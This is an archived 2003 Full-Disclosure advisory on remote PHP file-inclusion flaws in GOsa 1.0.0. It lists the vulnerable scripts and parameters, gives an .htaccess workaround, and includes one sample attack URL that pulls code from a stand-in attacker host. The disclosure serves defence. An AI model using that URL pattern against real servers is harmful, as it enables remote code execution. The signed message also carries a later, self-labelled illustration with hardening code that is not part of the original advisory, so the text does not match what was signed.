[Full-Disclosure] GOnicus System Administrator php injection

From: Karol Więsek (appelastat_private)
Date: Sun Feb 23 2003 - 13:17:58 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    
    I. BACKGROUND
    
    The GOnicus System Administrator is a PHP based administration tool
    for managing accounts/systems in LDAP databases.
    
    Project homepage : http://www.gonicus.de
    
    II. DESCRIPTION
    
    A remote attacker can inject arbitrary PHP code into GOsa
    that executes under the privileges of the underlying web server.
    There are several places where, by modifying certain request variables,
    an attacker could execute arbitrary PHP code.
    
    By setting the plugin variable in the following files, an attacker could
    include remote files and execute them as PHP code:
    
    plugins/3fax/1blocklists/index.php
    plugins/2administration/6departamentadmin/index.php
    plugins/2administration/5terminals/index.php
    plugins/2administration/4mailinglists/index.php
    plugins/2administration/3departaments/index.php
    plugins/2administration/2groupd/index.php
    
    The same situation exists in include/help.php, where the base variable
    can be set to a remote host so that a remote file is included.
    
    
    The following is a sample attack URL that would cause 
    "target.server" to load include/common.inc from  
    "attackers.server".
    
    http://target.server/include/help.php?base=http://attackers.server/
    
    GOsa doesn't support "register_globals off".
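    The root cause is an include path built from a request variable that register_globals turns into a PHP global. The following is an added illustration and not code from the advisory or from GOsa; the vulnerable form is an assumed pattern that reproduces the behaviour described above, placed beside a hardened replacement that fixes the base directory, reads request data explicitly from $_GET, and checks plugin names against an allow-list (the constant GOSA_BASE, the plugin list and the file name main.inc are assumptions).

```php
<?php
// Added illustration, not GOsa code. The vulnerable form below is an ASSUMED
// pattern that reproduces the advisory's description: an include path taken
// from a request variable while register_globals is on.

// --- Vulnerable pattern (assumed) -------------------------------------------
// With register_globals=on, a query string such as ?base=http://... creates
// $base before this function runs, so include() fetches and executes a file
// from wherever $base points.
function load_common_vulnerable() {
    global $base;                      // populated by register_globals
    include($base . "include/common.inc");
}

// --- Hardened replacement ----------------------------------------------------
// 1. Include paths are never built from request data; the base directory is a
//    constant fixed at install time.
// 2. Plugin names must match a strict character set and an explicit allow-list,
//    so neither URLs nor "../" sequences can reach include().
// 3. The resolved path must still lie under the install root.
define('GOSA_BASE', __DIR__ . '/');    // assumed install root

$ALLOWED_PLUGINS = array(            // assumed plugin list
    'blocklists', 'departmentadmin', 'terminals',
    'mailinglists', 'departments', 'groups',
);

function load_common_hardened() {
    // $base from the request is ignored entirely; the path is fixed.
    include(GOSA_BASE . 'include/common.inc');
}

function load_plugin_hardened($plugin, array $allowed) {
    // Reject anything that is not a plain identifier (no '/', ':', '.', ...).
    if (!is_string($plugin) || !preg_match('/^[a-z0-9_]{1,32}$/', $plugin)) {
        return false;
    }
    // Only names on the allow-list may be included.
    if (!in_array($plugin, $allowed, true)) {
        return false;
    }
    $root = realpath(GOSA_BASE) . DIRECTORY_SEPARATOR;
    $path = realpath(GOSA_BASE . 'plugins/' . $plugin . '/main.inc');
    // realpath() resolves symlinks and '..'; the result must stay under $root.
    if ($path === false || strpos($path, $root) !== 0) {
        return false;
    }
    include($path);
    return true;
}

// Read the plugin name from $_GET explicitly instead of relying on
// register_globals, so the script also works with register_globals=off.
$requested = isset($_GET['plugin']) ? $_GET['plugin'] : '';
if (!load_plugin_hardened($requested, $ALLOWED_PLUGINS)) {
    header('HTTP/1.0 400 Bad Request');
    echo "unknown plugin";
}
```

    The allow-list is the control that matters: character filtering alone stops URLs and path traversal, but the explicit list also prevents including arbitrary local files that happen to sit under the plugins directory.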
    
    III. ANALYSIS
    
    Remote exploitation allows an attacker to execute arbitrary
    commands and code under the privileges of the web server. This also
    opens the door to privilege escalation attacks. An attacker could also
    debug httpd child processes and grab secret information such as users'
    system passwords and LDAP passwords.
    
    IV. DETECTION
    
    GOsa version 1.0.0 (current) is confirmed vulnerable.
    
    V. Workaround
    
    A temporary solution is to enable Apache .htaccess authentication
    in all subdirectories containing .php files that are meant to be included,
    not accessed directly.
    
    Example .htaccess file
    
    # Pointing AuthUserFile at /dev/null means no user can ever authenticate,
    # so direct HTTP requests to these include-only scripts are refused,
    # while include() from other PHP scripts on the server is unaffected.
    # (The Apache directive is AuthUserFile, not UserAuthFile.)
    AuthType Basic
    AuthName koza
    AuthUserFile /dev/null
    require valid-user
    
    - -- 
    Karol Więsek [appelast-at-bsquad.sm.pl]
    http://bsquad.sm.pl/
    
    "Pub: a place one goes to every evening for the last time in one's
    life."
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5.8
    Comment: Bear Software, LLC,  http://bear-software.freeservers.com
    
    iQCVAwUBPlksdkKKOIVhErCVAQEeaAP+PBSWgy6Dealk+B3nNEmTQnsOzgUUuDd+
    KNAapeZmyyzmsHR+BmCAiKLICtau+3OivQbRyhuIjh/I1oXrmFRDSdZVEWaau6c4
    peTHhoHaTEbOpn4Wuc0D1axJhaeCboc1syOY3sss/U8cd+jEz7wQgBvWRcbmR02H
    VhwGjAjsVm8=
    =TYVx
    -----END PGP SIGNATURE-----
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    